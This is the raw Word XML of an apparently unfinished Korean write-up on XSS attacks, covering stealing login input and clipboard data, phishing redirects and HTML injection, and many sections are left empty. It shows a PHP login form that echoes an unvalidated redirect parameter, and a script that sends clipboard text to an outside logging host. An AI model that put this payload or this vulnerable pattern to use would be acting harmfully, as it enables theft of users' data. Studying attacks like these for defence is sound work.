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5227E" w14:textId="77777777"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14:paraId="61690FB1" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="003F170A" w:rsidP="003F170A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168BE3ED" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="003F170A" w:rsidP="003F170A"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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>를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r w:rsidR="00182BCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">를 통한 인증정보 노출 방지를 목표로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>는 경우가 있다. 이에 XSS를 활용한 다른 유형의 공격을 알아보고자 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB3C0C9" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="003F170A"/>
    <w:p w14:paraId="7DF78FA5" w14:textId="77777777" w:rsidR="003F170A" w:rsidRDefault="00182BCA" w:rsidP="00182BCA">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EA8BA" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRPr="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="00182BCA">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>스크립트 구문 삽입을 이용해서 다른 사용자에게 피해를 입힐 수 있는 다양한 방법을 알아본다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DAB9DBE" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00182BCA" w:rsidP="00182BCA"/>
    <w:p w14:paraId="6BCF6860" w14:textId="77777777" w:rsidR="00182BCA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입력 값 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE40983" w14:textId="77777777" w:rsidR="00182BCA" w:rsidRDefault="00010531" w:rsidP="00182BCA"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14:paraId="5D4DA9F3" w14:textId="39266E03" w:rsidR="00010531" w:rsidRDefault="00496245" w:rsidP="00496245">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인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76"/>
      </w:tblGrid>
      <w:tr w:rsidR="00684E4C" w14:paraId="00D26F9E" w14:textId="77777777" w:rsidTr="00D16879">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3B789075" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:left="800"/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 w14:paraId="1B4AA755" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="500" w:left="1000"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;head&gt;Login Page&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A021EA7" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="500" w:left="1000"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E5EBE0A" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="600" w:left="1200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;form action=</w:t>
            </w:r>
            <w:r>
              <w:t>”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login_submit.php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method=</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>post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14:paraId="73AD6982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&lt;label&gt;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:&lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EB5A54C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>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14:paraId="79934539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&lt;label&gt;Password :&lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21D39C23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14:paraId="4E19AAEE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hidden</w:t>
            </w:r>
            <w:r>
              <w:t>”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proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>redirectUrl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&lt;?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 xml:space="preserve"> echo $_GET[</w:t>
            </w:r>
            <w:r>
              <w:t>‘</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>rurl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>’</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>]; ?&gt;</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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14:paraId="49BF397D" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="700" w:left="1400"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rP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Submit</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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14:paraId="480D3FC2" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="600" w:left="1200"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F53DD07" w14:textId="77777777" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:leftChars="500" w:left="1000"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="623405E1" w14:textId="0F53306F" w:rsidR="00684E4C" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>&lt;/html&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00684E4C" w14:paraId="25275747" w14:textId="77777777" w:rsidTr="00D16879"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410C2F0" w14:textId="77777777" w:rsidR="00684E4C" w:rsidRPr="009C2CA8" w:rsidRDefault="00684E4C" w:rsidP="00D16879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실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3213300E" w14:textId="194D3D3E" w:rsidR="00684E4C" w:rsidRDefault="00AD7532" w:rsidP="00D16879">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="43332FFE" wp14:editId="1DC4ED28">
                  <wp:extent cx="5943600" cy="3923030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731D9" w14:textId="77777777" w:rsidR="00496245" w:rsidRDefault="00496245" w:rsidP="00496245"/>
    <w:p w14:paraId="5AC44703" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="002C1C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2C1CD1" w14:paraId="7F400EFD" w14:textId="77777777" w:rsidTr="007164AF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="36E5165B" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF">
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D9779DA" w14:textId="79D4668A" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF"/>
          <w:p w14:paraId="072A5D0A" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF">
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C1CD1" w14:paraId="2995FB3F" w14:textId="77777777" w:rsidTr="007164AF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578BEF41" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRPr="00684E4C" w:rsidRDefault="002C1CD1" w:rsidP="007164AF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2E66674F" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="007164AF"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21E14943" w14:textId="77777777" w:rsidR="002C1CD1" w:rsidRDefault="002C1CD1" w:rsidP="00496245"/>
    <w:p w14:paraId="3620139F" w14:textId="7C59AA08" w:rsidR="00496245" w:rsidRDefault="00496245" w:rsidP="00496245">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">비 인가 상태에서 사이트 이용 중 인증이 필요한 로그인 페이지로 사용자를 이동시켜 로그인 완료 후, 다시 이용 중이던 페이지로 이동시켜주는 방식의 </w:t>
      </w:r>
      <w:r w:rsidR="008C3A40">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서비스들을 많이 볼 수 있다. </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">이때 로그인 후 이동할 페이지 값을 페이지에 확인없이 포함하여 </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:t xml:space="preserve">Reflected XSS </w:t>
      </w:r>
      <w:r w:rsidR="00B813AF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점이 발생한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E78D393" w14:textId="77777777" w:rsidR="00B813AF" w:rsidRDefault="00B813AF" w:rsidP="00496245"/>
    <w:p w14:paraId="16DCEA06" w14:textId="77777777" w:rsidR="00B813AF" w:rsidRPr="00B813AF" w:rsidRDefault="00B813AF" w:rsidP="00496245"/>
    <w:p w14:paraId="5E82D41C" w14:textId="77777777" w:rsidR="00E81139" w:rsidRDefault="00E81139" w:rsidP="00182BCA"/>
    <w:p w14:paraId="077DB46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클립보드 값 탈취</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7FC20A" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531"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유사하지만 클립보드에 존재하는 값을 가로챈다는 차이점이 있다. 다음은 클립보드 값을 가로채는 공격의 예시이다. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C43F0EB" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="009E0257" w:rsidP="009C2CA8">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클립보드 복사</w:t>
      </w:r>
      <w:r w:rsidR="009C2CA8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">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9C2CA8" w14:paraId="4227BA5B" w14:textId="77777777" w:rsidTr="009C2CA8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="657E47CD" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;!DOCTYPE html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38957AE9" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="599904A6" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E54437F" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="80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</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>euc-kr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>" /&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AE4E41" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;title&gt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>중요테이터를</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> 복사하세요&lt;/title&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76FCFBC3" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;script src="https://cdn.jsdelivr.net/clipboard.js/1.5.3/clipboard.min.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6253541C" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="80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="https://code.jquery.com/jquery-3.1.1.min.js"&gt;&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="31CEA225" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/head&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F2F3577" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3122EFC5" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pP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14:paraId="245534BB" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    $(document).ready(function(){</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D4AD71" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="80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clipboard = new Clipboard('.clipboard');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="410EBB24" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">    });</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D2E2DEA" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>};</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1FA4620C" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0052198A" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68AA78EE" w14:textId="77777777" w:rsidR="00070285" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>일련번호</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> : &lt;input type = "text" id = "copy" value="8282"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EEE2C55" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="00070285" w:rsidP="00070285">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;button class="clipboard" data-clipboard-target="#copy"&gt; 복사 &lt;/button&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009C2CA8" w14:paraId="69EC9475" w14:textId="77777777" w:rsidTr="00684E4C">
        <w:trPr>
          <w:trHeight w:val="3798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9250A1B" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRPr="009C2CA8" w:rsidRDefault="009C2CA8" w:rsidP="00070285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실행결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9563" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D016780" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="00070285" w:rsidP="009C2CA8">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="163697A1" wp14:editId="4763C511">
                  <wp:extent cx="5280212" cy="23308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62"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5279367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82931" w14:textId="77777777" w:rsidR="009C2CA8" w:rsidRDefault="009C2CA8" w:rsidP="009C2CA8"/>
    <w:p w14:paraId="38210ABA" w14:textId="77777777" w:rsidR="00070285" w:rsidRPr="00EE7333" w:rsidRDefault="00070285" w:rsidP="009C2CA8">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">위와 같이 데이터를 클립보드에 저장하는 기능을 제공하는 사이트가 있다면, 사이트 이용 시 사용자와 관련된 정보가 클립보드에 저장되어 있을 가능성이 높다. </w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그 밖에도 </w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:t>Password”</w:t>
      </w:r>
      <w:r w:rsidR="00EE7333">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>와 같은 패스워드 관리 프로그램을 사용하는 사용자들은 패스워드가 클립보드에 저장되어 있어 주의가 필요하다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66A557D0" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="00096F6F" w:rsidP="009C2C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096F6F" w14:paraId="3095AC95" w14:textId="77777777" w:rsidTr="00065417">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="7026A305" w14:textId="77777777" w:rsidR="0002704B" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>&lt;script&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1548FC91" w14:textId="77777777" w:rsidR="0002704B" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>new Image().</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> = 'http://springs-thursday.iptime.org/st-apps/logging/loggin.php?c=' + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>window.clipboardData.getData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>('Text');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C0E02FF" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="0002704B" w:rsidP="0002704B">
            <w:r>
              <w:t>&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00096F6F" w14:paraId="45E67F3B" w14:textId="77777777" w:rsidTr="00684E4C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790A8F97" w14:textId="0CB8B17A" w:rsidR="00096F6F" w:rsidRPr="00684E4C" w:rsidRDefault="00684E4C" w:rsidP="00684E4C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25338E4A" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRDefault="00096F6F" w:rsidP="009C2CA8"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36ABC5D0" w14:textId="77777777" w:rsidR="00096F6F" w:rsidRPr="009C2CA8" w:rsidRDefault="00096F6F" w:rsidP="009C2CA8"/>
    <w:p w14:paraId="76D08C0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피싱 사이트로 이동</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A10F0" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>미리 구성한 피싱 사이트로 사용자를 이동시켜 사용자의 아이디, 패스워드를 가로채는 공격의 예시이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668899D5" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531"/>
    <w:p w14:paraId="218267A2" w14:textId="3A26B968" w:rsidR="008D2128" w:rsidRDefault="008D2128" w:rsidP="008D212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HTML 태그</w:t>
      </w:r>
      <w:r w:rsidR="004A0620">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 속성을</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 이용한 스크립트 실행</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CE70DE" w14:textId="77777777" w:rsidR="005C1003" w:rsidRPr="004A0620" w:rsidRDefault="005C1003" w:rsidP="005C1003"/>
    <w:p w14:paraId="64CCC545" w14:textId="77777777" w:rsidR="005C1003" w:rsidRPr="005C1003" w:rsidRDefault="005C1003" w:rsidP="005C1003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DDoS 공격</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EB8D2FE" w14:textId="77777777" w:rsidR="008D2128" w:rsidRDefault="008D2128" w:rsidP="008D2128"/>
    <w:p w14:paraId="1CD273D5" w14:textId="448194BC" w:rsidR="004A0620" w:rsidRDefault="002C1CD1" w:rsidP="002C1CD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HTML Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5292C454" w14:textId="515119E5" w:rsidR="002955C1" w:rsidRPr="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955C1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XSS 공격과 동일하게 사용자에게 서비스를 나타내는 과정에서 발생되지만 공격 시 HTML 태그를 삽입한다는 차이점이 있다. 위험도는 낮지만 다양한 활용방법이 존재한다. 다음은 계정을 가로채는 예시이다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="570A6A3B" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955C1">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:ind w:leftChars="0" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>로그인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2955C1" w14:paraId="46FB9E1F" w14:textId="77777777" w:rsidTr="004C1032">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="459A2EA1" w14:textId="54AA032A" w:rsidR="00D14A6E" w:rsidRDefault="00D14A6E" w:rsidP="00D14A6E">
            <w:pPr>
              <w:ind w:left="800"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002955C1" w14:paraId="7EA52BF7" w14:textId="77777777" w:rsidTr="004C1032"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DEDD79D" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="009C2CA8" w:rsidRDefault="002955C1" w:rsidP="004C1032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68757F65" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="004C1032"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2194A09D" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955C1"/>
    <w:p w14:paraId="5DE26081" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="002955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2955C1" w14:paraId="44AE362B" w14:textId="77777777" w:rsidTr="004C1032">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10664" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="48216861" w14:textId="157D6C2C" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="004C1032">
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002955C1" w14:paraId="18D61101" w14:textId="77777777" w:rsidTr="004C1032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6A60DCCC" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="00684E4C" w:rsidRDefault="002955C1" w:rsidP="004C1032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21035B66" w14:textId="77777777" w:rsidR="002955C1" w:rsidRDefault="002955C1" w:rsidP="004C1032"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="062FB355" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="002955C1" w:rsidRDefault="002955C1" w:rsidP="002C1CD1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFF79F9" w14:textId="77777777" w:rsidR="002955C1" w:rsidRPr="002C1CD1" w:rsidRDefault="002955C1" w:rsidP="002C1CD1"/>
    <w:p w14:paraId="33831578" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>결론</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DB631A" w14:textId="77777777" w:rsidR="00010531" w:rsidRDefault="00010531" w:rsidP="00010531"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14:paraId="252134D3" w14:textId="77777777" w:rsidR="00B625F3" w:rsidRPr="002955C1" w:rsidRDefault="00B625F3" w:rsidP="00010531"/>
